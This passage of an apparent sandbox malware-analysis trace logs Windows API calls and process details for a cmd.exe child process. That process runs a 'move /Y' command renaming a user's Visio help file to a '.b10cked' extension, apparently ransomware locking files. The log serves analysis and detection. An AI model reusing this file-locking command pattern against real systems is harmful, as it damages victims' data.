fInfoLevelId=0x1, lpFindFileData=0x12e91c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e91c) returned 0x190eb8 [0202.385] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x12e91c | out: lpFindFileData=0x12e91c) returned 0 [0202.386] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.386] GetLastError () returned 0x12 [0202.386] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e91c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e91c) returned 0x190eb8 [0202.386] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x12e91c | out: lpFindFileData=0x12e91c) returned 0 [0202.386] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.386] GetLastError () returned 0x12 [0202.387] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1c10) returned 0x190eb8 [0202.387] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x1a1c10 | out: lpFindFileData=0x1a1c10) returned 0 [0202.387] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.388] GetLastError () returned 0x12 [0202.388] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1c10) returned 0x190eb8 [0202.388] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x1a1c10 | out: lpFindFileData=0x1a1c10) returned 0 [0202.388] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.654] GetLastError () returned 0x12 [0202.654] _get_osfhandle (_FileHandle=2) returned 0xb [0202.654] GetFileType (hFile=0xb) returned 0x2 [0202.654] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.654] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12eaec | out: lpMode=0x12eaec) returned 1 [0202.654] _get_osfhandle (_FileHandle=2) returned 0xb [0202.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eb20 | out: lpConsoleScreenBufferInfo=0x12eb20) returned 1 [0202.654] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.656] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eb60 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.656] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12eb44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eb44*=0x2c) returned 1 [0202.656] longjmp () [0202.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.657] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.657] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.657] SetConsoleInputExeNameW () returned 0x1 [0202.657] GetConsoleOutputCP () returned 0x1b5 [0202.657] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.657] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.657] exit (_Code=1) Process: id = "480" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d60" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29386 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29387 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29388 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29389 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29390 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29391 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29392 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29393 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29394 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29395 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29782 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29783 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29784 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29785 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29786 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 29787 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29788 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29789 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29790 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29791 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29792 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29793 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29794 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29795 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29796 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 29797 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29798 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29799 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29800 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29801 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29802 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29803 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 29804 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 29805 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 29979 start_va = 0x430000 end_va = 0x4effff entry_point = 0x430000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 677 os_tid = 0x91c [0202.258] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fdd4 | out: lpSystemTimeAsFileTime=0x18fdd4*(dwLowDateTime=0xad5d2380, dwHighDateTime=0x1d440a9)) [0202.258] GetCurrentProcessId () returned 0xdb0 [0202.258] GetCurrentThreadId () returned 0x91c [0202.258] GetTickCount () returned 0x39165 [0202.258] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdcc | out: lpPerformanceCount=0x18fdcc*=25904696165) returned 1 [0202.258] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.258] __set_app_type (_Type=0x1) [0202.258] __p__fmode () returned 0x76b331f4 [0202.258] __p__commode () returned 0x76b331fc [0202.258] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.259] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.259] GetCurrentThreadId () returned 0x91c [0202.259] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x91c) returned 0x38 [0202.259] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.259] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.259] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.259] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.259] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd64 | out: phkResult=0x18fd64*=0x0) returned 0x2 [0202.259] VirtualQuery (in: lpAddress=0x18fd9b, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.259] GetConsoleOutputCP () returned 0x1b5 [0202.259] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.259] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.260] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.260] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.260] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.260] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.260] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.260] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.260] GetEnvironmentStringsW () returned 0x200190* [0202.260] FreeEnvironmentStringsW (penv=0x200190) returned 1 [0202.260] GetEnvironmentStringsW () returned 0x200190* [0202.261] FreeEnvironmentStringsW (penv=0x200190) returned 1 [0202.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ecd4 | out: phkResult=0x18ecd4*=0x40) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0xb8, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x0, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegCloseKey (hKey=0x40) returned 0x0 [0202.261] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ecd4 | out: phkResult=0x18ecd4*=0x40) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x0, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegCloseKey (hKey=0x40) returned 0x0 [0202.261] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.261] srand (_Seed=0x5b8863a4) [0202.261] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" [0202.261] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" [0202.262] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.262] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.262] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.262] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.262] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.262] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.262] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.262] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.262] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.262] GetEnvironmentStringsW () returned 0x2022e0* [0202.262] FreeEnvironmentStringsW (penv=0x2022e0) returned 1 [0202.262] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.262] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.262] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.262] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.262] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.262] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.263] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.263] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.263] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.263] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18faa0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18faa0, lpFilePart=0x18fa9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa9c*="Desktop") returned 0x18 [0202.263] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 [0202.264] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.264] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.264] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.264] GetEnvironmentStringsW () returned 0x202b00* [0202.264] FreeEnvironmentStringsW (penv=0x202b00) returned 1 [0202.264] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.264] GetConsoleOutputCP () returned 0x1b5 [0202.264] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.264] GetUserDefaultLCID () returned 0x409 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="0") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="0") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="1") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.265] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.266] GetConsoleTitleW (in: lpConsoleTitle=0x1f08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.266] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.266] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.266] GetProcAddress (hModule=0x76910000, 